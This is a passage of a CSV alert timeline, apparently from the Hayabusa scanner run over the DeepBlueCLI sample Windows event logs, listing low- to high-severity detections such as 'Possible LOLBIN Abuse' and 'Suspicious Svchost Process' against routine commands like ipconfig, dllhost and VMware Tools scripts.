0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:26.179 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:29.507 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:29.539 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:29.601 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:29.679 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:40.667 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 
0x60b6f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:44.084 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:44.084 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:46.165 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:35:46.165 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:36:24.719 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:36:26.520 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:48:30.867 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 21:48:30.867 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 22:05:29.336 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 22:57:17.289 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 22:57:39.909 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:00:54.622 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious 
Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:03:14.642 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 23:03:14.751 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:03.967 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:04.123 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:05.218 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:05.234 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:05.439 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:15.400 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:19.485 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:23.091 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:32:48.668 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:36:25.895 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 13:36:25.895 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:13:14.169 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:37:56.230 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:37:59.307 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:38:01.258 +00:00,IE10Win7,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:39:22.859 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:39:28.137 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 14:39:30.569 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 15:04:04.444 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 15:10:41.119 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-04 15:10:41.316 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:19.981 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:20.120 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:20.122 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:21.221 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:21.470 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:30.470 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:35.654 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 02:13:50.575 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 03:08:54.609 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 03:28:48.887 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 03:28:49.170 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:14.750 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:16.005 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:16.427 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:25.279 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 14:50:30.468 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 15:01:09.025 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 15:01:09.291 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:09:56.112 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:09:57.316 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:09:57.628 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:28:03.628 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 20:28:03.894 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:42.850 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:42.990 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:44.147 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:44.490 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 
+2016-09-17 22:53:53.459 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:53:58.662 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:17.454 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:31.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-17 22:56:46.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-17 22:56:46.218 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.218 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-17 22:56:46.328 +00:00,IE10Win7,4688,low,Evas,Windows 
